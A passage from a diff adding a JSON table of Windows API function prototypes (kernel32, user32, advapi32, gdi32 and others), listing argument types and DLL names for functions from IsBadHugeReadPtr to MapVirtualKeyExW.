VOID", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadHugeReadPtr(CONST VOID *lp, UINT ucb);" + }, + { + "function_name": "IsBadHugeWritePtr", + "arguments": [ + "LPVOID", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadHugeWritePtr(LPVOID lp, UINT ucb);" + }, + { + "function_name": "IsBadReadPtr", + "arguments": [ + "CONST VOID", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadReadPtr(CONST VOID *lp, UINT ucb);" + }, + { + "function_name": "IsBadStringPtrA", + "arguments": [ + "LPCTSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadStringPtrA(LPCTSTR lpsz, UINT ucchMax);" + }, + { + "function_name": "IsBadStringPtrW", + "arguments": [ + "LPCWSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadStringPtrW(LPCWSTR str, UINT max);" + }, + { + "function_name": "IsBadWritePtr", + "arguments": [ + "LPVOID", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadWritePtr(LPVOID lp, UINT ucb);" + }, + { + "function_name": "IsDBCSLeadByte", + "arguments": [ + "BYTE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsDBCSLeadByte(BYTE TestChar);" + }, + { + "function_name": "IsDBCSLeadByteEx", + "arguments": [ + "UINT", + "BYTE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsDBCSLeadByteEx(UINT CodePage, BYTE TestChar);" + }, + { + "function_name": "IsCharAlphaA", + "arguments": [ + "TCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharAlphaA(TCHAR ch);" + }, + { + "function_name": "IsCharAlphaNumericA", + "arguments": [ + "TCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharAlphaNumericA(TCHAR ch);" + }, + { + "function_name": "IsCharAlphaNumericW", + "arguments": [ + "WCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharAlphaNumericW(WCHAR ch);" + }, + { + "function_name": "IsCharAlphaW", + "arguments": [ + "WCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharAlphaW(WCHAR ch);" + }, + { + "function_name": "IsCharLowerA", + "arguments": [ + "TCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharLowerA(TCHAR ch);" + }, + { + "function_name": "IsCharLowerW", + "arguments": [ + "WCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharLowerW(WCHAR ch);" + }, + { + "function_name": "IsCharUpperA", + "arguments": [ + "TCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharUpperA(TCHAR ch);" + }, + { + "function_name": "IsCharUpperW", + "arguments": [ + "WCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsCharUpperW(WCHAR ch);" + }, + { + "function_name": "IsChild", + "arguments": [ + "HWND", + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsChild(HWND hWndParent, HWND hWnd);" + }, + { + "function_name": "IsClipboardFormatAvailable", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsClipboardFormatAvailable(UINT format);" + }, + { + "function_name": "IsDebuggerPresent", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsDebuggerPresent(void);" + }, + { + "function_name": "IsDialogMessageA", + "arguments": [ + "HWND", + "LPMSG" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsDialogMessageA(HWND hDlg, LPMSG lpMsg);" + }, + { + "function_name": "IsDialogMessageW", + "arguments": [ + "HWND", + "LPMSG" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsDialogMessageW(HWND hDlg, LPMSG lpMsg);" + }, + { + "function_name": "IsDlgButtonChecked", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT IsDlgButtonChecked(HWND hDlg, int nIDButton);" + }, + { + "function_name": "IsIconic", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsIconic(HWND hWnd);" + }, + { + "function_name": "IsMenu", + "arguments": [ + "HMENU" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsMenu(HMENU hMenu);" + }, + { + "function_name": "IsProcessorFeaturePresent", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsProcessorFeaturePresent(DWORD ProcessorFeature);" + }, + { + "function_name": "IsRectEmpty", + "arguments": [ + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsRectEmpty(CONST RECT * lprc);" + }, + { + "function_name": "IsTextUnicode", + "arguments": [ + "CONST LPVOID", + "int", + "LPINT" + ], + "dll_name": "advapi32.dll", + "full_prototype": "DWORD IsTextUnicode( CONST LPVOID lpBuffer, int cb, LPINT lpi );" + }, + { + "function_name": "IsValidAcl", + "arguments": [ + "PACL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL IsValidAcl( PACL pAcl );" + }, + { + "function_name": "IsValidCodePage", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsValidCodePage(UINT CodePage);" + }, + { + "function_name": "IsValidLocale", + "arguments": [ + "LCID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsValidLocale(LCID Locale, DWORD dwFlags);" + }, + { + "function_name": "IsValidSecurityDescriptor", + "arguments": [ + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL IsValidSecurityDescriptor( PSECURITY_DESCRIPTOR pSecurityDescriptor );" + }, + { + "function_name": "IsValidSid", + "arguments": [ + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL IsValidSid( PSID pSid );" + }, + { + "function_name": "IsWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsWindow(HWND hWnd);" + }, + { + "function_name": "IsWindowEnabled", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsWindowEnabled(HWND hWnd);" + }, + { + "function_name": "IsWindowUnicode", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsWindowUnicode(HWND hWnd);" + }, + { + "function_name": "IsWindowVisible", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsWindowVisible(HWND hWnd);" + }, + { + "function_name": "IsZoomed", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IsZoomed(HWND hWnd);" + }, + { + "function_name": "keybd_event", + "arguments": [ + "BYTE", + "BYTE", + "DWORD", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "VOID keybd_event(BYTE bVk,BYTE bScan, DWORD dwFlags, DWORD dwExtraInfo);" + }, + { + "function_name": "KillTimer", + "arguments": [ + "HWND", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL KillTimer(HWND hWnd,UINT uIDEvent);" + }, + { + "function_name": "LCMapStringA", + "arguments": [ + "LCID", + "DWORD", + "LPCTSTR", + "int", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCTSTR lpSrcStr, int cchSrc, LPTSTR lpDestStr, int cchDest);" + }, + { + "function_name": "LCMapStringW", + "arguments": [ + "LCID", + "DWORD", + "LPCWSTR", + "INT", + "LPWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "INT LCMapStringW(LCID lcid, DWORD flags, LPCWSTR src, INT srclen, LPWSTR dst, INT dstlen);" + }, + { + "function_name": "LeaveCriticalSection", + "arguments": [ + "LPCRITICAL_SECTION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection);" + }, + { + "function_name": "LineDDA", + "arguments": [ + "int", + "int", + "int", + "int", + "LINEDDAPROC", + "LPARAM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL LineDDA(int nXStart, int nYStart, int nXEnd, int nYEnd, LINEDDAPROC lpLineFunc, LPARAM lpData);" + }, + { + "function_name": "LineTo", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL LineTo(HDC hdc, int nXEnd, int nYEnd);" + }, + { + "function_name": "LoadAcceleratorsA", + "arguments": [ + "HINSTANCE", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HACCEL LoadAcceleratorsA(HINSTANCE hInstance, LPCTSTR lpTableName);" + }, + { + "function_name": "LoadAcceleratorsW", + "arguments": [ + "HINSTANCE", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HACCEL LoadAcceleratorsW(HINSTANCE hInstance, LPCWSTR lpTableName);" + }, + { + "function_name": "LoadBitmapA", + "arguments": [ + "HINSTANCE", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HBITMAP LoadBitmapA(HINSTANCE hInstance, LPCTSTR lpBitmapName);" + }, + { + "function_name": "LoadBitmapW", + "arguments": [ + "HINSTANCE", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HBITMAP LoadBitmapW(HINSTANCE hInstance, LPCWSTR lpBitmapName);" + }, + { + "function_name": "LoadCursorA", + "arguments": [ + "HINSTANCE", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR LoadCursorA(HINSTANCE hInstance, LPCTSTR lpCursorName);" + }, + { + "function_name": "LoadCursorFromFileA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR LoadCursorFromFileA(LPCTSTR lpFileName);" + }, + { + "function_name": "LoadCursorFromFileW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR LoadCursorFromFileW(LPCWSTR lpFileName);" + }, + { + "function_name": "LoadCursorW", + "arguments": [ + "HINSTANCE", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR LoadCursorW(HINSTANCE hInstance, LPCWSTR lpCursorName);" + }, + { + "function_name": "LoadIconA", + "arguments": [ + "HINSTANCE", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON LoadIconA(HINSTANCE hInstance, LPCTSTR lpIconName);" + }, + { + "function_name": "LoadIconW", + "arguments": [ + "HINSTANCE", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON LoadIconW(HINSTANCE hInstance, LPCWSTR lpIconName);" + }, + { + "function_name": "LoadImageA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "UINT", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE LoadImageA( HINSTANCE hinst, LPCTSTR lpszName, UINT uType, int cxDesired, int cyDesired, UINT fuLoad );" + }, + { + "function_name": "LoadImageW", + "arguments": [ + "HINSTANCE", + "LPCWSTR", + "UINT", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE LoadImageW(HINSTANCE hinst, LPCWSTR lpszName, UINT uType, int cxDesired, int cyDesired, UINT fuLoad);" + }, + { + "function_name": "LoadKeyboardLayoutA", + "arguments": [ + "LPCTSTR", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HKL LoadKeyboardLayoutA(LPCTSTR pwszKLID, UINT Flags);" + }, + { + "function_name": "LoadKeyboardLayoutW", + "arguments": [ + "LPCWSTR", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HKL LoadKeyboardLayoutW(LPCWSTR pwszKLID, UINT Flags);" + }, + { + "function_name": "LoadLibraryA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HINSTANCE LoadLibraryA(LPCTSTR lpLibFileName);" + }, + { + "function_name": "LoadLibraryW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HMODULE LoadLibraryW(LPCWSTR libnameW);" + }, + { + "function_name": "LoadLibraryExA", + "arguments": [ + "LPCTSTR", + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HINSTANCE LoadLibraryExA(LPCTSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);" + }, + { + "function_name": "LoadLibraryExW", + "arguments": [ + "LPCWSTR", + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HMODULE LoadLibraryExW(LPCWSTR libnameW, HANDLE hfile, DWORD flags);" + }, + { + "function_name": "LoadMenuA", + "arguments": [ + "HINSTANCE", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU LoadMenuA(HINSTANCE hInstance, LPCTSTR lpMenuName);" + }, + { + "function_name": "LoadMenuIndirectA", + "arguments": [ + "CONST MENUTEMPLATE" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU LoadMenuIndirectA(CONST MENUTEMPLATE *lpMenuTemplate);" + }, + { + "function_name": "LoadMenuIndirectW", + "arguments": [ + "CONST MENUTEMPLATE" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU LoadMenuIndirectW(CONST MENUTEMPLATE *lpMenuTemplate);" + }, + { + "function_name": "LoadMenuW", + "arguments": [ + "HINSTANCE", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU LoadMenuW(HINSTANCE hInstance, LPCWSTR lpMenuName);" + }, + { + "function_name": "LoadModule", + "arguments": [ + "LPCSTR", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD LoadModule(LPCSTR lpModuleName, LPVOID lpParameterBlock);" + }, + { + "function_name": "LoadResource", + "arguments": [ + "HMODULE", + "HRSRC" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HGLOBAL LoadResource(HMODULE hModule, HRSRC hResInfo);" + }, + { + "function_name": "LoadStringA", + "arguments": [ + "HINSTANCE", + "UINT", + "LPTSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int LoadStringA(HINSTANCE hInstance, UINT uID, LPTSTR lpBuffer, int nBufferMax);" + }, + { + "function_name": "LoadStringW", + "arguments": [ + "HINSTANCE", + "UINT", + "LPWSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int LoadStringW(HINSTANCE hInstance, UINT uID, LPWSTR lpBuffer, int nBufferMax);" + }, + { + "function_name": "LocalAlloc", + "arguments": [ + "UINT", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HLOCAL LocalAlloc(UINT uFlags, UINT uBytes);" + }, + { + "function_name": "LocalCompact", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT LocalCompact(UINT uMinFree);" + }, + { + "function_name": "LocalFileTimeToFileTime", + "arguments": [ + "CONST FILETIME *", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL LocalFileTimeToFileTime(CONST FILETIME * lpLocalFileTime, LPFILETIME lpFileTime);" + }, + { + "function_name": "LocalFlags", + "arguments": [ + "HLOCAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT LocalFlags(HLOCAL hMem);" + }, + { + "function_name": "LocalFree", + "arguments": [ + "HLOCAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HLOCAL LocalFree(HLOCAL hMem);" + }, + { + "function_name": "LocalLock", + "arguments": [ + "HLOCAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID LocalLock(HLOCAL hMem);" + }, + { + "function_name": "LocalReAlloc", + "arguments": [ + "HLOCAL", + "UINT", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HLOCAL LocalReAlloc(HLOCAL hMem, UINT uBytes, UINT uFlags);" + }, + { + "function_name": "LocalShrink", + "arguments": [ + "HLOCAL", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT LocalShrink(HLOCAL hloc, UINT cbNewSize);" + }, + { + "function_name": "LocalSize", + "arguments": [ + "HLOCAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT LocalSize(HLOCAL hMem);" + }, + { + "function_name": "LocalUnlock", + "arguments": [ + "HLOCAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL LocalUnlock(HLOCAL hMem);" + }, + { + "function_name": "LockFile", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL LockFile(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD nNumberOfBytesToLockLow,DWORD nNumberOfBytesToLockHigh);" + }, + { + "function_name": "LockFileEx", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL LockFileEx(HANDLE hFile,DWORD dwFlags, DWORD dwReserved, DWORD nNumberOfBytesToLockLow, DWORD nNumberOfBytesToLockHigh, LPOVERLAPPED lpOverlapped );" + }, + { + "function_name": "LockResource", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID LockResource(HGLOBAL hResData);" + }, + { + "function_name": "LockWindowUpdate", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL LockWindowUpdate(HWND hWndLock);" + }, + { + "function_name": "LockWorkStation", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL LockWorkStation(VOID);" + }, + { + "function_name": "LogonUserA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "LPTSTR", + "DWORD", + "DWORD", + "PHANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LogonUserA( LPTSTR lpszUsername, LPTSTR lpszDomain, LPTSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken );" + }, + { + "function_name": "LogonUserW", + "arguments": [ + "LPWSTR", + "LPWSTR", + "LPWSTR", + "DWORD", + "DWORD", + "PHANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LogonUserW(LPWSTR lpszUsername,LPWSTR lpszDomain,LPWSTR lpszPassword,DWORD dwLogonType,DWORD dwLogonProvider,PHANDLE phToken);" + }, + { + "function_name": "LookupAccountNameA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "PSID", + "LPDWORD", + "LPTSTR", + "LPDWORD", + "PSID_NAME_USE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupAccountNameA( LPCTSTR lpSystemName, LPCTSTR lpAccountName, PSID Sid, LPDWORD cbSid, LPTSTR ReferencedDomainName, LPDWORD cbReferencedDomainName, PSID_NAME_USE peUse );" + }, + { + "function_name": "LookupAccountNameW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "PSID", + "LPDWORD", + "LPWSTR", + "LPDWORD", + "PSID_NAME_USE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupAccountNameW( LPCWSTR lpSystemName, LPCWSTR lpAccountName, PSID Sid, LPDWORD cbSid, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse );" + }, + { + "function_name": "LookupAccountSidA", + "arguments": [ + "LPCTSTR", + "PSID", + "LPTSTR", + "LPDWORD", + "LPTSTR", + "LPDWORD", + "PSID_NAME_USE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupAccountSidA( LPCTSTR lpSystemName, PSID Sid, LPTSTR Name, LPDWORD cbName, LPTSTR ReferencedDomainName, LPDWORD cbReferencedDomainName, PSID_NAME_USE peUse );" + }, + { + "function_name": "LookupAccountSidW", + "arguments": [ + "LPCWSTR", + "PSID", + "LPWSTR", + "LPDWORD", + "LPWSTR", + "LPDWORD", + "PSID_NAME_USE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupAccountSidW(LPCWSTR lpSystemName,PSID Sid,LPWSTR Name,LPDWORD cbName,LPWSTR ReferencedDomainName,LPDWORD cbReferencedDomainName,PSID_NAME_USE peUse);" + }, + { + "function_name": "LookupIconIdFromDirectory", + "arguments": [ + "PBYTE", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "int LookupIconIdFromDirectory(PBYTE presbits, BOOL fIcon);" + }, + { + "function_name": "LookupIconIdFromDirectoryEx", + "arguments": [ + "PBYTE", + "BOOL", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int LookupIconIdFromDirectoryEx(PBYTE presbits, BOOL fIcon, int cxDesired, int cyDesired, UINT Flags);" + }, + { + "function_name": "LookupPrivilegeDisplayNameA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPTSTR", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupPrivilegeDisplayNameA( LPCTSTR lpSystemName, LPCTSTR lpName, LPTSTR lpDisplayName, LPDWORD cbDisplayName, LPDWORD lpLanguageId );" + }, + { + "function_name": "LookupPrivilegeDisplayNameW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPWSTR", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupPrivilegeDisplayNameW (LPCWSTR lpSystemName, LPCWSTR lpName, LPWSTR lpDisplayName, LPDWORD cbDisplayName, LPDWORD lpLanguageId);" + }, + { + "function_name": "LookupPrivilegeNameA", + "arguments": [ + "LPCTSTR", + "PLUID", + "LPTSTR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupPrivilegeNameA( LPCTSTR lpSystemName, PLUID lpLuid, LPTSTR lpName, LPDWORD cbName );" + }, + { + "function_name": "LookupPrivilegeNameW", + "arguments": [ + "LPCWSTR", + "PLUID", + "LPWSTR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupPrivilegeNameW ( LPCWSTR lpSystemName, PLUID lpLuid, LPWSTR lpName, LPDWORD cchName );" + }, + { + "function_name": "LookupPrivilegeValueA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "PLUID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupPrivilegeValueA( LPCTSTR lpSystemName, LPCTSTR lpName, PLUID lpLuid );" + }, + { + "function_name": "LookupPrivilegeValueW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "PLUID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL LookupPrivilegeValueW( LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid );" + }, + { + "function_name": "LPtoDP", + "arguments": [ + "HDC", + "LPPOINT", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL LPtoDP(HDC hdc,LPPOINT lpPoints, int nCount);" + }, + { + "function_name": "lstrcatA", + "arguments": [ + "LPTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPTSTR lstrcatA(LPTSTR lpString1,LPCTSTR lpString2);" + }, + { + "function_name": "lstrcatW", + "arguments": [ + "LPWSTR", + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPWSTR lstrcatW(LPWSTR lpString1, LPWSTR lpString2);" + }, + { + "function_name": "lstrcmpA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int lstrcmpA(LPCTSTR lpString1, LPCTSTR lpString2);" + }, + { + "function_name": "lstrcmpW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int lstrcmpW(LPCWSTR str1, LPCWSTR str2);" + }, + { + "function_name": "lstrcmpiA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int lstrcmpiA(LPCTSTR lpString1, LPCTSTR lpString2);" + }, + { + "function_name": "lstrcmpiW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int lstrcmpiW(LPCWSTR str1, LPCWSTR str2);" + }, + { + "function_name": "lstrcpyA", + "arguments": [ + "LPTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPTSTR lstrcpyA(LPTSTR lpString1, LPCTSTR lpString2);" + }, + { + "function_name": "lstrcpyW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPCWSTR lstrcpyW(LPCWSTR lpString1, LPCWSTR lpString2);" + }, + { + "function_name": "lstrcpynA", + "arguments": [ + "LPTSTR", + "LPCTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPTSTR lstrcpynA(LPTSTR lpString1, LPCTSTR lpString2,int iMaxLength);" + }, + { + "function_name": "lstrcpynW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPCWSTR lstrcpynW(LPCWSTR lpString1, LPCWSTR lpString2, int iMaxLength);" + }, + { + "function_name": "lstrlenA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int lstrlenA(LPCTSTR lpString);" + }, + { + "function_name": "lstrlenW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int lstrlenW(LPCWSTR lpString);" + }, + { + "function_name": "LZClose", + "arguments": [ + "INT" + ], + "dll_name": "lz32.dll", + "full_prototype": "VOID LZClose(INT hFile);" + }, + { + "function_name": "LZCopy", + "arguments": [ + "INT", + "INT" + ], + "dll_name": "lz32.dll", + "full_prototype": "LONG LZCopy(INT hfSource,INT hfDest);" + }, + { + "function_name": "LZOpenFileA", + "arguments": [ + "LPTSTR", + "LPOFSTRUCT", + "WORD" + ], + "dll_name": "lz32.dll", + "full_prototype": "INT LZOpenFileA(LPTSTR lpFileName,LPOFSTRUCT lpReOpenBuf, WORD wStyle);" + }, + { + "function_name": "MakeAbsoluteSD", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSECURITY_DESCRIPTOR", + "LPDWORD", + "PACL", + "LPDWORD", + "PACL", + "LPDWORD", + "PSID", + "LPDWORD", + "PSID", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL MakeAbsoluteSD( PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor, PSECURITY_DESCRIPTOR pAbsoluteSecurityDescriptor, LPDWORD lpdwAbsoluteSecurityDescriptorSize, PACL pDacl, LPDWORD lpdwDaclSize, PACL pSacl, LPDWORD lpdwSaclSize, PSID pOwner, LPDWORD lpdwOwnerSize, PSID pPrimaryGroup, LPDWORD lpdwPrimaryGroupSize );" + }, + { + "function_name": "MakeSelfRelativeSD", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSECURITY_DESCRIPTOR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL MakeSelfRelativeSD( PSECURITY_DESCRIPTOR pAbsoluteSecurityDescriptor, PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor, LPDWORD lpdwBufferLength );" + }, + { + "function_name": "MakeSureDirectoryPathExists", + "arguments": [ + "IN LPSTR" + ], + "dll_name": "imagehlp.dll", + "full_prototype": "BOOL MakeSureDirectoryPathExists(IN LPSTR Path);" + }, + { + "function_name": "MapDialogRect", + "arguments": [ + "HWND", + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL MapDialogRect(HWND hDlg, LPRECT lpRect);" + }, + { + "function_name": "MapGenericMask", + "arguments": [ + "PDWORD", + "PGENERIC_MAPPING" + ], + "dll_name": "advapi32.dll", + "full_prototype": "VOID MapGenericMask( PDWORD AccessMask, PGENERIC_MAPPING GenericMapping );" + }, + { + "function_name": "MAPISendDocuments", + "arguments": [ + "ULONG", + "LPTSTR", + "LPTSTR", + "LPTSTR", + "ULONG" + ], + "dll_name": "mapi32.dll", + "full_prototype": "ULONG FAR PASCAL MAPISendDocuments(ULONG ulUIParam, LPTSTR lpszDelimChar, LPTSTR lpszFullPaths, LPTSTR lpszFileNames, ULONG ulReserved);" + }, + { + "function_name": "MapViewOfFile", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID MapViewOfFile(HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,DWORD dwNumberOfBytesToMap);" + }, + { + "function_name": "MapViewOfFileEx", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID MapViewOfFileEx(HANDLE hFileMappingObject,DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress);" + }, + { + "function_name": "MapVirtualKeyA", + "arguments": [ + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT MapVirtualKeyA(UINT uCode, UINT uMapType);" + }, + { + "function_name": "MapVirtualKeyExA", + "arguments": [ + "UINT", + "UINT", + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT MapVirtualKeyExA(UINT uCode, UINT uMapType, HKL dwhkl);" + }, + { + "function_name": "MapVirtualKeyExW", + "arguments": [ + "UINT", + 